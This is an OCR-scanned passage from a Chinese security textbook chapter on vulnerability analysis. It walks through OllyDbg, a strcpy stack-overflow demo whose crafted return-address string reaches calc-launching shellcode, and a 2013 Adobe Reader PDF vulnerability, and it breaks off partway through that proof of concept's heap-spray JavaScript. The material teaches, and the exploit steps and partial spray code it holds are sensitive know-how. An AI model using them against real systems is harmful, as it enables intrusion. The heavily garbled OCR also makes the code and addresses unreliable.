ROP 链 所 需 的 地 址 位 置 。 请 大 家 自己 动手 操作 ， 下 载 OD 工具 并 打开 。 可 以 看 到 在 界面 的 
左上 角 是 反 汇编 的 主 窗口 ， 右 上 角 是 寄存 器 窗口 ， 左 下 角 是 内 存 窗口 ， 右 下 角 是 堆栈 调 
用 窗口 (参考 图 9-1) 。 相 比 WinDbg，OllyDbg 的 界面 操作 起 来 更 直观 ， 可 以 通过 调试 界 
面 ， 选 择 对 程序 单 步调 试 或 者 直接 执行 等 操作 ， 通 过 右 侧 可 以 直接 观察 到 寄存 器 的 变化 情 
况 ， 如 果 标 红 ， 表 示 在 这 一 汇编 代码 结束 后 会 影响 到 该 寄存 器 存放 的 值 ， 这 更 加 有 利于 对 
漏洞 的 回溯 工作 。 

在 菜单 栏 中 可 以 看 到 L、E、M、W 等 按钮 ， 这 些 按钮 代表 OllyDbg 的 其 他 几 个 窗口 ， 
通过 其 他 几 个 窗口 中 的 内 容 可 以 辅助 我 们 进行 反 汇编 调试 。 

其 中 区 窗口 表示 堆栈 调用 的 查看 ， 功 能 与 WinDbg 里 的 KK 相同， 可 以 查看 该 汇编 代码 前 
的 函数 调用 情况 ， 帮 助 我 们 回溯 汇编 代码 执行 的 流程 〈 见 图 8-10) 。 


of main thread 
dg Ez | 从 调用 | 
010021B0| 7??? calc.0100218E 
calc.XHModuleEntryPoint?*16F 
kerne132.7C817865 























9007FEO00 






0007FFCh|7C817067 |??? 


图 8-10 ”OllyDbg 堆 栈 调 用 窗口 
窗口 表示 可 执行 模块 ， 其 中 可 查看 该 程序 执行 时 调用 的 模块 名 称 、 地 址 等 ， 这 在 构 
造 ROP 链 、ASLR 绕 过 方式 等 方面 都 会 起 很 大 的 作用 ( 见 图 8-11〉。 


7 


EN Ul mEszeHd 











91012475 





6661F 000 





KERNEL32, msucrt 
KERNEL32, MSRCH3: 
.88.2980.5512 |RDUAPIS2, GDI32, KERNEL32, msucrt 


01008080 са1с 5 

58FB9999| 991Cn996| 58FD686E | AcGenral 5 

58DC0880| 00037000 5ADC1626 | UxTheme 6 

5CC30000 00026000 5CC38E55 | ShinEng 5 E| 

62C20000 00009000 62C22EAD LPK 5.1.2688.5512 (16DI32, KERNEL32, ntdll, USER32, U! | 

73630000 0002E000 73659FE1  nsctfime ime 5.1.2680.5512 (18DURPI32, 60132, IMM32, KERNEL32, 

73FR0890| 0006B000 73FBE489 USP10 1.0520.2600.551] 8DURPI32, 60132, KERNEL32, USER32 

71680000) 0004C008| 75681365 | HSCTF- 5.1.2688.5512 (iRDURPI32, GDI32, KERNEL32, msucrt ` 

759D0000 0000F000 759D15E^| USERENU 5 

76300000 0001D000 763012C0| IHH32 5 

76990000| 0013D008| 76990089 | 01e32 5 
5 
5 


1 
1.2608.5512 (iRDURPI32, KERNEL32, nsucrt, ntdll 
-1.2688.5512 (iRDURPIS2, 60132, КЕВМЕІ 32, ntdll, 
1.2608.5512 (iRDURPIS2, GDI32, KERNEL32, nsucrt 
76B40000 000260000| 76B12B61| WINMM 1.2688.5512 (18DURPI32, 60132, KERNEL32, ntdll, 
770F0000 0008B000 77 0F1560 OLERUT32 1 ADUAPI32, GDI32, KERNEL32, msucrt 
77180000 00103000 77185256| conct132 6.8 (xpsp.08051: ADURPI32, GDI32, KERNEL32, msucrt 
77BB0000 00015000 77BB1292| MSACM32 5.1.2680.5512 (18DURPI32, GDI32, KERNEL32, msucrt a 
站 


770nannn| ааапоааа 770n440C | neoe tan с я одпа cc49 / 


图 8-11 ”OllyDbg 可 执行 模块 窗口 
M 窗 口 是 内 存 映 射 的 情况 ， 这 里 可 以 看 到 每 个 模块 的 地 址 、 访 问 权 限 等 ， 比 如 通过 E 
窗口 找到 想 要 构造 ROP 链 调用 地 址 的 模块 ， 通 过 分 析 它 的 读 取 权 限 来 决定 是 否 使 用 该 模块 
中 的 地 址 ， 或 布置 shellcode 位 置 的 选择 等 〈 见 图 8-12) o 























































{$ of main threa 
Map |R R 
Map R 
ФА Priv ВМ вм 
. Priv|RY RY 
Map |RV RY 
Мар |R R C: WINDOUSNSysten32 uni code .n1s 
Map |R R C: NINDOUSNSysten32V10cale.nls 
902; i" Map |R R C:\WINDOWS\system32\sortkey.nls 
002! 0 Map |R R C:\WINDOWS\systen32\sorttbls.nls 
90290000 Мар |R R 
002E0000 Map |R E RE 
9031 9 Мар |R E RE 
Priv|RU ви 
Priu| ВМ Ru 
00300000 . Priu| RV RY 
063E 0000, Map |R R 
693F6999| Мар | RM Ru 
90100000, Map |R R 
LI Prio RW ви 
00120000 . Prio RW Ru 
00530000, Map |R R C: NMIINDOUSNSysten32Vctype.nls 








图 8-12 ”OllyDbg 内 存 窗口 

OllyDbg 之 所 以 作为 入 门 级 调试 工具 ， 就 在 于 其 简单 易 懂 的 界面 ， 可 以 通过 堆 窗口 、 
栈 窗口 以 及 寄存 器 窗口 很 直观 地 观察 到 程序 执行 及 漏洞 触发 过 程 中 堆栈 空间 的 内 存 变化 情 
况 ， 甚 至 可 以 观察 到 当 漏 洞 触发 时 构造 的 畸形 字符 串 覆 盖 栈 空间 及 导致 恶意 代码 执行 的 整 
个 过 程 ， 相 比 OllyDbg、WinDbg 就 需要 更 多 的 命令 来 查看 这 一 过 程 。 

因此 ， 对 于 OllyDbg 的 掌握 有 助 于 初学 者 对 于 漏洞 分 析 的 快速 入 门 ，OllyDbg 同 样 提供 
了 很 多 的 插件 ， 这 里 就 不 一 一 讲解 ， 在 今后 的 学 习 过 程 中 ， 会 逐渐 了 解 到 OD 的 插件 是 如 
何 辅助 调试 的 。 


8.1.3 strcpy 引 发 的 “血案 ” 


首先 笔者 编写 了 一 个 有 漏洞 的 程序 ， 程 序 中 关键 点 在 于 strcpy 函 数 ， 这 也 是 目前 很 多 栈 
溢出 漏洞 的 根本 原因 ， 大 多 数 都 是 因为 对 于 数组 边界 检查 不 够 严格 造成 的 〈 见 图 8-13) 。 
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int flag = 8; 
char overflou a[188]-"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; 


图 8-13” 超 长 字符 串 定义 
可 以 看 到 给 overflow_a 赋 值 为 一 个 超 长 字符 串 ， 这 就 是 触发 漏洞 的 超 长 字符 串 ， 这 也 
方便 后 期 笔者 在 构造 利用 shellcode 时 候 修改 。 
图 8-14 所 示 是 一 段 笔者 触发 漏洞 的 关键 代码 ，strcmp 并 不 是 关键 ， 只 是 之 前 笔者 做 密 
码 绕 过 的 实验 时 使 用 的 ， 这 个 漏洞 的 关键 点 是 下 面 的 strcpy， 可 以 看 到 上 面 构造 的 数组 大 
小 为 8， 而 定义 的 overflow_a 数 组 大 小 为 a 元 素 的 个 数 ， 那 么 当 笔 者 以 超 长 串 拷贝 到 b 数 组 
中 的 时 候 ， 会 造成 多 出 来 的 a 元 素 履 盖 到 栈 中 b 数 组 下 面 的 内 容 ， 造 成 栈 被 破坏 ， 从 而 产 
生 溢出 。 
char b[8]; 
i =strcmp(overflow a,overflow b); 


strcpy(b,overflou a); 
return i; 


图 8-14 ”漏洞 触发 关键 代码 
挂 载 WinDbg， 执 行 如 下 程序 。 
可 以 看 到 程序 崩溃 了 ，WinDbg 弹 了 出 来 ， 而 目前 指向 的 地 址 是 61616161， 也 就 是 a 的 
ASCII 码 〈 十 六 进 制 情况 下 ) ， 这 是 一 片 无 效 的 内 存 空 间 ， 直 白地 说 程序 无 法 读 取 这 段 内 
存 空间 中 的 汇编 语言 继续 执行 程序 ， 导 致 了 程序 崩溃 ， _ 如 图 8-15 所 示 。 


(604.128); Access viola — code c0000008 (111 second chance !!! 
Gaxs6lélel6l ebx-7tÍdt000 ecx«0012£f40 edx-00000000 esi-0042205d 5. ENDE 
eip*61616161 esp*0012fec8 ebp*61616161 іор1=0 nv up ei pl zr na pe 
cs=001b ss=*0023 ds-0023 еѕ=0023 fs -003b gs-0000 efl= 00000246 
61616161 ?? ??? 


图 8-15 ”程序 崩溃 现场 
当然 如 果 笔 者 要 利用 的 话 ， 会 将 特定 的 shellcode 覆 盖 在 特定 的 空间 使 程序 执行 ， 这 在 
Windows XP 系统 下 是 成 立 的 ， 但 是 目前 大 多 数 系统 都 会 开启 DEP、ASLR 这 些 内 存 执行 保 
护 、 地 址 随机 化 等 保护 措施 ， 当 然 现在 的 黑 帽 子 们 也 提供 了 各 种 绕 过 方法 ， 比 如 构造 ROP 
链 、 利 用 虚 表 指针 等 方式 。 
这 里 不 袭 述 。 下 面 来 看 看 栈 中 的 情况 ， 如 图 8-16 所 示 。 
0:000› dd esp 
0012fec8 61616161 61616161 61616161 61616161 
0012fed8 cccccc00 cccccccc cccccccc cccccccc 
0012#ее8 cccccccc cccccccc cccccccc cccccccc 
0012#е#8 cccccccc cccccccc сссссссс cccccccc 
0012##08 cccccccc cccccccc сссссссс сссссссс 
0012##18 61616161 61616161 61616161 61616161 
0012##28 61616161 61616161 61616161 61616161 
0012##38 61616161 00000000 00000000 00000000 
图 8-16 ”程序 崩溃 时 栈 中 情况 
通过 图 8-16 和 图 8-15 可 以 看 到 EBP， 也 就 是 栈 底 已 被 修改 成 61616161， 而 假设 当 
初 为 栈 开辟 的 是 30h 的 大 小 ， 那 么 此 时 的 大 小 是 ebp-esp 栈 底 - 栈 顶 ) 也 就 是 61616161- 
0012fec8， 换 名 话说 已 经 破坏 了 栈 平 衡 ， 这 个 栈 也 被 破坏 了 。 
下 面 ， 笔 者 将 以 正 向 调试 的 角度 来 为 大 家 还 原 整 个 漏洞 触发 的 过 程 ， 这 在 真正 的 漏洞 
调试 中 也 是 分 析 漏 洞 形成 原因 以 及 利用 方法 的 最 后 一 步 ， 笔 者 为 大 家 跳 过 的 是 之 前 逆向 回 
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漳 的 整个 过 程 ， 而 这 个 只 有 数 十 行 汇编 代码 的 程序 也 将 略 去 利用 “! heap-p-a” 开 启 页 堆 
等 繁复 的 过 程 。 

首先 改 用 OllyDbg 工 具 ， 执 行程 序 并 且 在 程序 main 函 数 的 入 口 点 断 住 〈 见 图 8-17) ， 
假设 这 就 是 一 个 复杂 的 漏洞 程序 还 原 到 触发 点 之 前 的 两 个 函数 。 








оолотова. BE 38205200 [mov esi,offset 00422038 ASCII "аааааааааааааааааааааааааааааааааааа" 
ооаотовғ ||. 807D 98 lea edi,[ebp-68] 

001010с2/|. F3:n5 rep mous dword ptr [edi],dword ptr [esi] 

oosoroca||. a^ mous byte ptr [edi],byte ptr [esi] 

90401005||- B9 0F000000 |тоо ecx, oF 

оолотоса ||. ззсе xor eax,eax 

004010сс||. 807D BD lea edi,[ebp-43] 

wonpiocr||. F3:AB rep stos dword ptr [edi] 

senpiopi||. 66:08 stos word ptr [edi] 

900401003 p stos byte ptr [edi] 

00401004||» вв 01000000 гпоо eax,1 

s0&01009||. 85c0 test eax,eax 

оваоторв || .. 7а 35 jz short 09401112 

влотооо ||. BoD ов lea ecx,[ebp-68] 

0040100. 51 push ecx 

904010E1||- ЕВ 1FFFFFFF | call 09301005 Cv 
004010E6 83Ch 0h add esp 

004010Е9||. 8985 rc mov dword ptr [ebp-^],eax 

о0л0твЕс |. 8370 FC 00 | сар dword ptr [ebp-^],0 

овавтоғе||.. 7^ OF je short 60401101 

904010r2||- өв 30202200 || push offset 00122030 ASCII "not" 
001010ғ7/|. ЕВ 14020000 || call printf Cprintr 
O04018FC|| . 83C въ add еѕр,а 

9gne919FF|| .。EB OF jmp short 08481110 

















00401101 


M" 
š 
š 
š 
š 
š 


ush offset 00422028 ASCII “okta” 





图 8-17 ”程序 反 汇 编 定 位 
略 去 main 函 数 入 口 处 对 于 栈 的 一 系列 操作 ， 在 最 项 上 的 函数 可 以 看 到 将 偏 移 尾 
00422038 处 保存 的 ASCII 码 存 入 ESI， 其 实 当 使 用 OllyDbg 时 可 以 在 栈 内 看 到 将 这 一 串 a 推 入 
栈 中 的 过 程 ， 而 黄色 标记 的 一 行 中 的 call 正 是 漏洞 触发 的 关键 函数 ， 相 当 于 触发 漏洞 的 最 
后 一 层 函 数 ， 那 么 在 这 个 函数 下 断 点 跟 进 看 一 看 〈 见 图 8-18) 。 








00101023 |. 83EC 4C Sub esp,^C 

， 53 push ebx 

901010271]. 56 push esi 

90101028 |. 57 push edi 

00401029 |. 8070 B4 lea edi,[ebp-8C] 

0050102C |. В9 13000000 | mou ecx,13 

90101031]. B8 CCCCCCCC | mou eax,CCCCCCCC 

00401036 ||. ЕЗ:АВ rep stos dword ptr [edi] 

00101038 |. 68 1C205200 | push offset 0052201C ASCII "1234567" 
0050103D |. 8B45 08 mou eax,duord ptr [ebp+8] 

9$0501050||- 50 push eax 

00501041||- Ев F0010000 |call strcmp Cstrcmp 
00501056 |. 83C4 08 add esp,8 

00501059]|. 8945 FC mou dword ptr [ebp-h],eax 

0050105C||- 8B4D 08 mou ecx,duord ptr [ebp+8] 

9$050105F|] - 51 push ecx 

00501050 |. 8055 Fh lea edx,[ebp-8C] 

60501053||. 52 push edx 

00501054||. E8 F7000000 |call strcpy Cstrcpy 
80401059}. 83C4 88 add esp,8 

0040105C|| - $S8Bh5 FC mou eax,dword ptr [ebp-^] 

















图 8-18 ”程序 反 汇编 定位 

可 以 看 到 ，strcpy 函 数 此 时 push 了 ecx 及 edx，ecx 赋 值 是 ecbp+8， 也 就 是 该 函数 的 第 一 个 
参数 ， 就 是 上 面 传 入 的 aaaaaaaaaaaaaaa， 那 么 下 面 edx 就 应 该 是 我 们 的 b8 数 组 了 ， 这 样 可 
以 直接 让 程序 执行 多 次 后 ， 发 现 strepy 函 数 内 部 的 内 容 ， 其 实 就 是 将 超 长 字符 串 以 4 个 字 节 
( 即 4 个 a 为 一 段 〉 为 一 个 单位 复制 到 寄存 器 ， 那 么 在 栈 溢出 发 生 的 最 后 一 个 调用 ， 可 以 看 
到 此 时 ebp 的 值 是 0012FEC0， 而 当 以 超 长 串 复制 到 寄存 器 后 ， 可 以 看 到 ebp 的 值 被 修改 成 
了 61616161， 这 也 就 造成 了 栈 溢 出 〈 见 图 8-19) ， 这 里 只 要 精确 地 修改 返回 地 址 的 值 就 能 
实现 对 于 程序 的 控制 ， 从 而 执行 想 执行 的 内 容 ， 修 改 overflow 数 组 的 内 容 如 图 8-20 所 示 。 
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ERX 7EFEFEFE 

ECX 8812FF38 ASCII "aaaa" 

EDX 61616161 

EBX 7FFD7888 

ESP 8812FE58 

EBP 8812FECB ASCII "aaaaaaaaaaaaa 


m/— п 
y 
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Be12FF18|| 61616161 
0012FF41C|| 61616161 
B812FF28|| 61616161 
8612FF25|| 61616161 
Be12FF28|| 61616161 
8812FF2C|| 61616161 
8012FF38|| 61616161 
9612FF34|| 61616161 
ааааааа" 9012ЕЕ38 || 61616161 


图 8-19 “程序 溢出 栈 中 情况 
unsigned char overflow a[]-"Nx61Nx61Vx61Nx61Nx61Nx61Nx61Nx61Nx61Nx61Vx61Nx61Nx61Nx61Vx61Vx61Vx12VX 85V X FaXX7 FANXCCNXCCM. 
Hj8-20 ”构造 畸形 字符 串 
程序 执行 后 断 在 cc int 3 处 ， 可 见 在 经 过 7ffa4512 跳 转 之 后 ， 程 序 来 到 了 7ffa4512 后 面 的 
内 容 ， 稍 后 可 以 跟 一 遍 程序 的 流程 看 看 为 何 会 断 在 那个 位 置 。 
这 里 cc 只 是 为 了 强行 让 程序 断 下 ， 以 验证 返回 地 址 确实 被 改 成 了 7ffa4512， 这 样 程 序 


才 会 执行 jmp esp 跳 转 到 cc， 将 cc 改 成 calc 的 








shellcode 就 可 以 弹出 计算 器 了 “〈 见 图 8-21) o 
-oix 





图 8-21 溢出 后 弹出 计算 器 表示 漏洞 存在 
弹出 计算 器 正如 第 6 章 中 的 alert('1') 一 样 ， 证 明了 漏洞 的 存在 。 当 然 ， 怀 着 不 良心 思 
的 黑客 就 不 会 简单 地 弹出 计算 器 了 。 





814 分 析 利 用 漏洞 的 一 些 基 本 技巧 


漏洞 分 析 其 实 就 是 逆向 的 过 程 ， 唯 一 不 一 样 的 就 是 不 需要 对 这 个 程序 整个 执行 流程 有 
很 深刻 地 了 解 ， 只 需要 知道 漏洞 是 如 何 发 生 的 ， 如 何 构 造 畸形 数据 再 现 漏洞 场景 ， 最 后 能 
够 利用 就 行 了 。 这 里 要 强调 一 下 ， 白 帽子 一 般 只 负责 到 能 够 重 现 漏洞 场景 ， 分 析 漏 洞 的 危 





害 ， 提 出 解决 方案 ， 以 及 给 厂商 提供 exploi 
绑 木 马 或 者 病毒 ， 用 言 打 或 者 钓鱼 实施 攻 吉 


it 就 行 了 。 而 黑客 会 以 此 构造 真正 的 exploit， 捆 


Lio 





这 个 PDF 漏 洞 是 2013 年 的 漏洞 ， 笔 者 在 虚拟 机 里 搭建 了 一 个 XP SP3 的 环境 ， 安 装 
Adobe Reader 11.0， 成 功 触发 POC (漏洞 样本 ， 一 般 是 无 害 的 ) ， 通 过 Windbg 挂 载 导致 程 


序 骨 溃 ， 使 Windbg 跳 出 来 〈 见 图 8-22) o 
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8888888 ?? 


7 TJIIUUUU 7UUJJUUU 
iodLoad: 49010000 49096000 
(238.698): Access violation - code c0000005 (!!! second chance !!!) 


ір=88888888 esps0012dea0 ebps0012dedc iopl-0 nv up еі pl zr па pe nc 
=001b 5355-0023 ds-0023 za аныны fs-003b gs-0000 &ef1-00200246 


v 7 
C:\WINDOWVS\systen32\Msftedit .dll 











VARNING: Frame IP 
0012de9c 208а54е0 
0012dedc 208a59be 
0012df44 20925538 
0012df64 20825488 
0012dfac 20cdccc0 





20825461 c20400 
20885464 6a18 
20825466 b81dlédd20 
208a546b e808c9£5ff 
20885470 8bf9 
20825472 897df0 
20845475 #7510 
20825478 8365ес00 
208a547c ff750c 
208a547f 8d45dc 
20845482 50 
20825483 e897000000 
20845488 85с0 
208a548a 7405 
208а548с 83с004 


20845491 33с0 
208а5493 8b30 


208a549a 7403 

20825 49с #4604 
208a549f c745e4b82ce820 
208a54a6 33db 

208a54a8 43 

20825429 8d4de0 
208a54ac 895dfc 
208a54af e82e42f8ff 
208a54b4 8Ь7#44 
208a54b7 85ff 

208a54b9 7430 
208a54bb 837e4400 
208a54bf 740b 
208a54cl ff75f0 
208a54c4 8Ь4е44 


208a54cc 144704 
208a54cf 8b4e44 


з 
> 


208а5444 740а 
208a54d6 {14904 


208а544Ь 8Ь01 





图 8-22 ”PDF 漏洞 触发 现场 
这 就 是 案 发 的 时 候 ， 可 以 看 到 目前 内 存 位 置 在 88888888， 其 实 这 时 候 栈 已 经 被 破坏 
了 ，eip 跳 转 到 一 个 没有 东西 的 内 存 空 间 ， 所 以 程序 出演 了 。 现 在 就 开始 逆向 还 原 整个 过 
程 ， 通 过 命令 来 回溯 整个 过 程 。 
如 图 8-23 所 示 ， 由 下 往 上 是 依次 调用 关系 ， 就 是 C 语 言 的 函数 嵌 套 ， 比 如 说 A 调 用 B， 
B 调 用 了 C， 那 么 “ 案 发 ”前 的 那 一 刻 函数 对 应 的 地 址 是 208a54e0， 用 WinDbsg 查 看 该 段 函 
数 的 汇编 代码 ， 如 图 8-24 所 示 。 


ChildEBP RetAddr Args to Child 


not in ап 
00000001 
0012df14 
0012df 88 
0012df88 
0012dfe8 


图 8-23 
1 


18h 
езх. 


edi, 
dvord ptr [ebp-10h].edi 
dword ptr [ebp+10h] 
dword ptr [ebp-14h].0 
push dword ptr [ebp+0Ch] 
lea езх. 


push езх 
Call AcroForxa!PlugInMain+Oxa31f1 (2088551f) 


test esx, eax 

je AcroFora!PlugInMain*0xa3163 (208а5491) 
add езх, 4 

хог esx eax 

aov esi.dvord ptr [езх] 

je AcroFora!PlugInMain*0xa3171 (208a549£) 


inc dvord ptr [esi+4] 
aov сука pir [ebp-1Ch].offset AcroForn!DllUnregisterServer«Üx4det 
„el 


lea ecx, 
aov dvord ptr [ebp-4] ebx 

call AcroFora!PluginMain*0x273b4 (208296e2) 
aov edi, 
test edi.edi 

je AcroFora!PlugInMain+0xa3ibd (208a54eb) 
сар dword ptr [esi+44h].0 

je AcroFora!PlugInMain*0xa319e (208а54сс) 
push dvord ptr [ebp-10h] 

aov ecx, 


inc dvord ptr [edi+4] 
aov ecx. 


je AcroFora!PlugInMain*0xa31b2 (208а54е0) 
dec dvord ptr [ecx+4] 


Nov езх, 


ret 
push 

aov „Offset ÀcroFora!DllUnregisterServer+0x42cffd (20441614) 
call АстоЁога+0х1478 (20801478) 
aov 

aov 

and 


,dword ptr [ecx] 


ny known module. Folloving frames may be wrong 
8b019f09 00000001 0х88888888 

10241#44 00000001 AcroForm!PlugInMain*0xa31b2 
00000000 00000001 ÀcroForm!PlugInMain+Oxa3690 
04224530 00000001 AcroForm!PlugInHain+0xa320a 
04224530 00000001 AcroForn!PlugInMain*0xa315a 


PDF 漏洞 触发 时 堆栈 调用 情况 


ecx 


[ebp-24h] 


[ebp-20h] 


dvord ptr [edi+44h] 


dvord ptr [esi+44h] 
4 (20917482) 


dvord ptr [esi+44h] 


Üxa31b2 (208a54e0) 








208a54de ff10 са: dvord ptr [езх 
208а54е1 8bcf aov ecx. edi + 
图 8-24 PDF 漏洞 触发 前 汇编 代码 分 析 
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画 线 的 部 分 是 笔者 认为 最 重要 的 部 分 ， 为 了 方便 大 家 理解 ， 用 一 个 流程 图 来 简化 上 面 
的 过 程 ， 如 图 8-25 所 示 。 


call AcroForm!PlugInMain+0xa31fl(eax) return eax 





езі = [eax+4] 


ecx = [esi+44h]= [eax+4+44h] 


eax = [ecx] = [esir44h] = [eax+4+44b] 





call eax 漏洞 触发 


图 8-25 “PDF 漏洞 触发 流程 
由 图 8-25 可 以 看 到 漏洞 触发 的 原因 就 在 于 AcroFormI!PlugInMain+0xa31f1 返 回 的 eax， 
经 过 多 次 赋值 后 ，eax 被 改变 了 。 因 为 这 个 改变 ， 导 臻 最 后 call eax 的 时 候 使 程序 跳 转 到 了 
88888888， 此 时 栈 已 经 被 破坏 了 。 用 IDA Pro 来 加 载 这 个 存在 漏洞 的 AcroForm.api， 查 看 这 
段 函数 的 伪 代 码 ( 见 图 8-26)。 


int _ stdcall sub 20880551F(int a1, int a2, int a3) 
‹ 





sub 2088553F(a1, 32, аз, 8, 8); 
| return 31; 
› 


图 8-26 ”PDF 漏洞 触发 时 伪 代 码 
其 实 通过 上 面 的 汇编 语句 也 不 难看 出 eax 作 为 这 个 函数 第 一 个 参数 被 传 入 ， 经 过 这 个 
函数 的 执行 ， 第 一 个 参数 又 被 返回 ， 然 后 继续 上 面 的 流程 ， 这 个 参数 被 传 入 后 又 进行 
了 sub_208A553F 这 个 函数 的 一 系列 操作 。 由 于 笔者 没有 下 载 符 号 表 ， 所 以 无 法 告诉 大 家 
函数 的 名 字 ， 这 个 函数 里 面 的 代码 有 100 行 左右 ， 具 体 分 析 过 程 笔者 就 不 袭 述 了 ， 其 大 
致 功能 其 实 就 是 创建 一 个 新 的 对 象 指 针 ， 并 且 分 配给 这 个 指针 64 Byte 的 内 存 ， 如 图 8-27 
所 示 。 
v2h = w(_DWORD x*)(u22 + 8)-- == 1; 
if ( v24 ) 
(Qe (uoid (  cdecl ***)(_DWORD, DWORD))u22)(1 
T = sub 2080950F(65); 
*( BVTE *)(a1 - 4) = 8; 
if ( v25 == v7 ) 
v26 - 8; 
A esi = sub 20829301(07, a1 - 24, 07); 
*( BYTE *)(a1 - 4) = 6; 
if ( v26 #= v? ) 
**x( DWORD x)(u26 + 4); 
v27 = *( DUORD x)(a1 - 64); 
图 8-27 ”pdf 漏洞 触发 指针 空间 分 配 异 常 点 伪 代码 
我 们 可 以 用 IDA Pro 看 到 分 配 空 间 的 过 程 ， 其 实 这 里 用 汇编 看 可 能 更 清晰 〈 见 图 
8-28) 。 
Ë 


2 a40 push 40h 
208а5722 e8e83cf6ff call AcroForm!PlugInMain*0x70el (2080940f) 
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图 8-28 PDF 漏洞 触发 指针 分 配 异常 点 汇编 代码 

push 40h 就 是 将 分 配 内 存 空间 的 大 小 作为 参数 传 入 ，40h 转 换 成 十 进 制 就 是 64， 
而 下 面 call 的 函数 其 实 就 相当 于 C 语 言 中 的 malloc， 只 不 过 malloc 是 动态 分 配 空间 。 
再 回 到 之 前 的 流程 图 中 ， 问 题 就 来 了 ，eax+4 作 为 这 个 指针 的 起 始 被 传 出 赋值 给 了 esi， 然 后 
esit44h 赋 值 给 了 ecx， 而 其 实 这 个 指针 的 大 小 只 有 40h， 这 就 造成 了 内 存 地 址 越界 ， 导 致 了 漏 
洞 的 触发 ， 那 么 只 要 想方设法 构造 这 个 越界 位 置 中 的 值 就 可 以 完成 对 这 个 漏洞 的 利用 。 

利用 漏洞 部 分 只 做 简要 的 说 明 ， 因 为 会 涉及 ROP 链 的 构造 ， 而 且 这 个 漏洞 的 利用 其 实 
也 伴随 着 另 一 个 内 存 泄露 基 址 的 漏洞 ， 以 此 来 绕 过 DEP 和 ASLR 保 护 。 其 实 该 漏洞 本 身 就 
已 具备 了 绕 过 ASLR 的 功能 ， 但 是 由 于 构造 畸形 数据 的 特殊 性 ， 如 果 单 用 这 个 漏洞 只 能 覆 
盖 少 量 的 shellcode， 而 利用 这 个 漏洞 会 用 到 正常 用 的 heap spray， 也 就 是 对 喷 技 术 ， 来 看 看 
它 的 内 存 空间 变 成 了 什么 〈 见 图 8-29) 。 


0с0с0с28 88 88 88 88 28 0с Oc 0с 28 0с Oc Oc 28 Oc 0с 0с P 
0с0с0с38 28 Oc 0с 0с 28 0с Oc 0с 28 Oc Oc Oc 28 Oc 0с Oc ( 
0с0с0с48 28 Oc Oc Oc 28 0с Oc 0с 28 Oc Oc Oc 28 Oc 0с 0с ( 
0с0с0с58 28 0с 0с 0с 28 0с 0с 0с 28 0с Oc Oc 00 00 00 00 (.. 
0сбсбс68 00 00 00 00 оо оо оо 00 оо 00 оо 00 00 00 00 00 ... 
0с0с0с78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0с0с0с88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0с0с0с98 00 00 00 00 00 00 00 00 00 00 00 оо оо оо 00 00 
Ос0с0са8 00 00 00 00 00 00 00 00 00 00 00 00 00 оо 00 00 
OcOcOcb8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
Ос0с0ссв 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
Ос0с0саів 00 00 00 00 00 оо 00 00 оо оо оо оо 00 оо 00 00 
Ос0с0сев 00 00 00 00 00 00 00 00 00 00 00 00 оо оо 00 00 
Ос0с0с#8 00 00 00 00 00 00 00 00 00 00 00 OO 00 00 00 00 
0с0с0аов 00 00 оо оо 00 оо оо оо оо 00 00 00 оо оо 00 00 
0с0с0818 00 00 00 00 00 00 00 00 28 Oc Oc Oc 01 00 00 00 
0с0с0428 88 88 88 88 28 Oc Oc 0с 28 Oc Oc Oc 28 Oc Oc Oc 
0c0c0d38 28 0с Oc Oc 28 Oc Oc Oc 28 Oc Oc Oc 28 Oc Oc 0с ( 
0с0с0948 28 0с Oc Oc 28 Oc Oc Oc 28 Oc Oc 0с 28 Oc Oc 0с (. 
0с0с0958 28 Oc Oc Oc 28 Oc Oc Oc 28 Oc Oc Oc 00 00 00 00 ( 
Ос0с0а68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0с0с0а78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
О0с0с0а8в 00 00 оо оо 00 оо оо оо оо оо 00 оо оо 00 00 00 
0с0с0а98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0cocoda8 00 00 00 00 00 00 00 00 00 00 00 00 OO 00 00 00 
Ос0соаьв 00 00 00 оо оо оо оо 00 оо 00 оо 00 оо оо 00 00 
Ос0с0асв 00 00 00 00 00 OO 00 00 00 00 OO 00 00 00 00 00 
0с0с0дав 00 00 оо оо оо оо оо оо 00 оо 00 00 оо 00 00 00 
Ос0с0дев 00 00 00 00 00 00 00 00 00 00 00 OO 00 00 00 00 
0с0с0а#8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
Ос0с0е08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
Üc0c0el8 00 00 00 00 00 00 00 00 28 Oc Oc Oc 01 00 00 00 
OcOc0e28 88 88 88 88 28 0с Oc 0с 28 Oc Oc Oc 28 Oc Oc Oc 
OcOc0e38 28 Oc 0с 0с 28 0с Oc 0с 28 Oc Oc Oc 28 Oc Oc 0с 
OcOc0e48 28 0с 0с Oc 28 Oc Oc Oc 28 0с Oc Oc 28 Oc Oc 0с 
0с0с0е58 28 0с 0с Oc 28 0с 0с 0с 28 Oc Oc Oc 00 00 00 00 


图 8-29 ”PDF 堆 喷 后 内 存 空间 情况 








这 段 喷射 代码 在 POC 中 也 有 体现 ， 我 们 用 Ultra Edit 打 开 POC。 


var dataNodes = []; 

var uiListNodes = []; 
var choiceListNodes = []; 
var contentAreas = []; 
var strArray = []; 

var cntArea = 147; 

var ggg; 


var gFakePointer = 0x0c0c0c20; 
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var gTargetEip = 0x88888888; 
var padding = unescape ("$ubbbb"); 


while ( padding.length < (449*2+2*29*11) ) [padding += padding; 
padding = padding.substring(0, (449*242*29*11));| 
function DWordToString( val ) ( 
return String.fromCharCode( val & OxFFFF ) + String.fromCharCode 
( (val >> 16) & OxFFFF ); 
) 


function HighWord( val ) ( 
return String.fromCharCode( (val »» 16) & OxFFFF ); 


var contentAreas = []; 

function AllocateContentArea( cnt ) ( 
var name - "contentArea"; 

For { жал = pru p c cnt b у q 


contentAreas.push( xfa.template.createNode (name, "t") ); 


function AllocateDefectiveNodes( fakePointor ) ( var thunk = 
DwordToString( fakePointor ); while (thunk.length < 
{2*2*2*%2*25%2*2*2*2*2*2®1з®*2уу thunk += Chunk; 
AllocateContentArea( (2*2*2*2*2*2*2*2*2) ); 

